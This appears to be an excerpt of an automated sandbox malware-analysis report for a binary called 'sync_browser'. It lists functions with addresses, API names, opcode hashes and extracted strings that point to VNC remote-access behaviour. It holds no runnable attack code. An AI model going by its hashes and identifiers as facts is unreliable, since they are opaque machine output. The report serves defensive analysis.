                                                                      • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                      • API String ID: 3439327939-3305976270
                                                                      • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                      • Instruction ID: 00904e88e4dd01a527c5afa1778253c4e6dec4f05e8816c171b1e8153baee19a
                                                                      • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                      • Instruction Fuzzy Hash: 05018E33509BC486E720DB64F45136AF3A0FB84BA0F884235E69A42B98DF7CD450C760
                                                                      Function 00007FF7E509F6F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ClassMessageNamePost
                                                                      • String ID: WindowsScreenSaverClass
                                                                      • API String ID: 650004062-352026012
                                                                      • Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                      • Instruction ID: 99d3f02d0e566a33d64f380aedd898d00eaf16a5318d003f6a3bd61096d572d0
                                                                      • Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                      • Instruction Fuzzy Hash: 0A014F35618F8981E7719B15F9607EAA390FB88B84F801132DA8C47B5CDE3CE155CB11
                                                                      Function 00007FF7E507D8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLastMapping
                                                                      • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                      • API String ID: 1790465270-3305976270
                                                                      • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                      • Instruction ID: 7af49f32d99627b76fa1b3551ba738d20a1af642f6a4f156add7a898980be9cc
                                                                      • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                      • Instruction Fuzzy Hash: C7018F33508BC582E7609B28F41136AF7A0E744B74F948335E6BA426E8DF7CC490C721
                                                                      Function 00007FF7E50989E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessageObjectSendSingleWait
                                                                      • String ID: vncclient.cpp : client Kill() called
                                                                      • API String ID: 353115698-1198714380
                                                                      • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                      • Instruction ID: f312a061da74ba03b0872a2af2c9b547ccd3f36cf02330cbe0d46a5bb84453b9
                                                                      • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                      • Instruction Fuzzy Hash: A401843260458981FB58EF35E4657A9A360EF84F64F844332D73C866D9CF38D494C392
                                                                      Function 00007FF7E5076760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF7E507678B
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpen
                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                                      • API String ID: 47109696-713323490
                                                                      • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                      • Instruction ID: 047d8b64c85204cf5dc99fb6324e3f8490b87ac12df5f1b22558766bee909760
                                                                      • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                      • Instruction Fuzzy Hash: 03F0FC21A1864181DB109B34E41436AE374FF54F94F941036DA4D477A8EF7DC084C716
                                                                      Function 00007FF7E50DCEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: getpeernameinet_ntoa
                                                                      • String ID: <unavailable>
                                                                      • API String ID: 1982201544-1096956887
                                                                      • Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                      • Instruction ID: 95c9c8dbbeac6e399d16bdf514139273657b29b4bbab0361524648393d051d9e
                                                                      • Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                      • Instruction Fuzzy Hash: 97F0127561874986EB60AB10F4612A9B360FB88B58FC01536E54D46728DF3CE105CB11
                                                                      Function 00007FF7E50E1740 Relevance: 5.1, APIs: 4, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                      • String ID:
                                                                      • API String ID: 1225357528-0
                                                                      • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                      • Instruction ID: 23bfc82c3f249ba77a3999dfbbbf93e0427fdaec6d47f8a9d4a11122c1f06bc3
                                                                      • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                      • Instruction Fuzzy Hash: 0D115151B1C28A82EE44B666B26137E9251AF84FC0F945032FA4EC778BDE3DD4824716
                                                                      Function 00007FF7E5107A70 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast
                                                                      • String ID:
                                                                      • API String ID: 918212764-0
                                                                      • Opcode ID: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                                      • Instruction ID: 5b5f19a9e074b78df117916adc87f461b53d91afe47539c2a744cf604a18f417
                                                                      • Opcode Fuzzy Hash: 29aa8eabd37ce073336345db576575990ec91cb532e4ac08565d8b170ae5ab50
                                                                      • Instruction Fuzzy Hash: 6F211E31A19A4EC6EB50BF24E4A0369B360FF44F48FA41132DA4E83659DF3CD845C762